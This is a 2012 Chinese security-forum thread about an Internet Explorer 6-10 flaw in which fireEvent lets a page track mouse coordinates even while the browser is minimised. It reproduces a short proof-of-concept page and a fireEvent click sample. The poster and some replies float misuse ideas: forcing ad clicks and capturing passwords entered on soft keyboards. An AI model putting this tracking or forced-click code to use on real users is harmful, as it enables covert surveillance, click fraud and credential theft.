首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 二进制漏洞
    3. 发新帖
[讨论]IE(6-10)鼠标跟踪漏洞
2012-12-13 23:43 4150

[讨论]IE(6-10)鼠标跟踪漏洞

s朽木s 活跃值
2012-12-13 23:43
4150
刚刚在exploit-db上看到一个挺有意思的东西。原文链接http://www.exploit-db.com/exploits/23321/   通过利用fireEvent,触发onmousemove事件,可以完整的记录鼠标的移动路径,甚至在IE最小化或者不是当前窗口的情况下也可以获取当前鼠标坐标。
作者给出的exploit如下:
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>

在MSDN中fireEvent的描述很简单,就是触发一个指定的事件对象。google了下发现fireEvent也可以触发鼠标单击事件,如下:
<HTML>
<HEAD>
<SCRIPT>
function fnFireEvents()
{
div.innerText = "The cursor has moved over me!";
btn.fireEvent("onclick");
}
</SCRIPT>
</HEAD>
<BODY>
<h1>Using the fireEvent method</h1>
By moving the cursor over the DIV below, the button is clicked.
<DIV ID="div" onmouseover="fnFireEvents();">
Mouse over this!
</DIV>
<BUTTON ID="btn" ONCLICK="this.innerText='I have been clicked!'">Button</BUTTON>
</BODY>

个人感觉这东西还是有一定的利用价值的,特别是用在哪万恶的广告上,让你“被迫”点击
在原文里作者给了2个demo,大家可以看下,挺有意思的。

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 0
打赏
分享
最新回复 (7)
迷死人
雪    币: 179
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
迷死人 2012-12-14 02:35
2
0
这个好啊
bklang
雪    币: 27
活跃值: (631)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
私信
bklang 1 2012-12-14 07:48
3
0
牛帖,前排留名,我实验了果然好用,应该百度、谷歌已经用上这种方法,测试是不是发送鼠标虚拟按键来点击广告了。
孤单的狼
雪    币: 27
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
孤单的狼 2012-12-14 09:57
4
0
MARK  测试可用 嘿
误码率
雪    币: 40
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
误码率 2012-12-14 10:36
5
0
这个个人感觉没多大用处
Dstlemoner
雪    币: 292
活跃值: (153)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
Dstlemoner 2012-12-14 11:02
6
0
Mouseover 这个东西  早在2010年Discuz! 出现的一个漏洞中体现了。
PEYlxZ
雪    币: 159
活跃值: (40)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
PEYlxZ 2012-12-15 21:24
7
0
比如,记录鼠标轨迹,软键盘输入密码时就可用了……
pende
雪    币: 21
活跃值: (25)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
pende 1 2012-12-21 09:36
8
0
这个思路好用
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回